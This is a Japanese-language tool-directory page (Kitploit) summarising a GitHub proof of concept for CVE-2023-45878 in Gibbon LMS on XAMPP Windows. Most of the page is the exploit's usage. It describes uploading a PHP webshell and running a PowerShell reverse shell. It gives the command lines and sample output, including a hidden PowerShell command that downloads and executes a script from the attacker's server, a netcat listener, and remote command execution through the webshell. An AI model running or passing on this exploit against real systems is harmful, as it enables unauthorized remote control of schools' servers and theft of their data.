Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-45878-POC — CVE-2023-45878 の gibbon LMS 用 XAMPP Windows 上の PoC | Kitploit
ツール/GitHubGitHub/pauldhaes/cve-2023-45878-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubpauldhaes/cve-2023-45878-poc

CVE-2023-45878-POC

CVE-2023-45878 の gibbon LMS 用 XAMPP Windows 上の PoC

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-45878-POC

CVE-2023-45878のPOC - XAMPP Windows上のGibbon LMS向け。 コマンドインジェクション用のwebshell(shell.php)をアップロードします。 リバースシェルの場合、shell.ps1というPowerShellリバースシェルスクリプトをアップロードします。これはshell.phpを使用してターゲットマシンにアップロードされます。

必要条件

Python3 Requests Python3モジュール netcat

pip3 install requests

仮想環境

mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests

使い方

AV(アンチウイルス)が無効のXAMPP Windows上で動作するGibbon LMSでテスト済み。 ターゲットは、Gibbonのログインページ(例: http://gibbon-example/Gibbon-LMS/)を使用して見つけることができます。

リバースシェル

python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT

結果

[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>

単一コマンド

python3 reverse.py --single -target_url http://target -command whoami

結果

[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice

クレジット

https://herolab.usd.de/security-advisories/usd-2023-0025/

ツールをダウンロード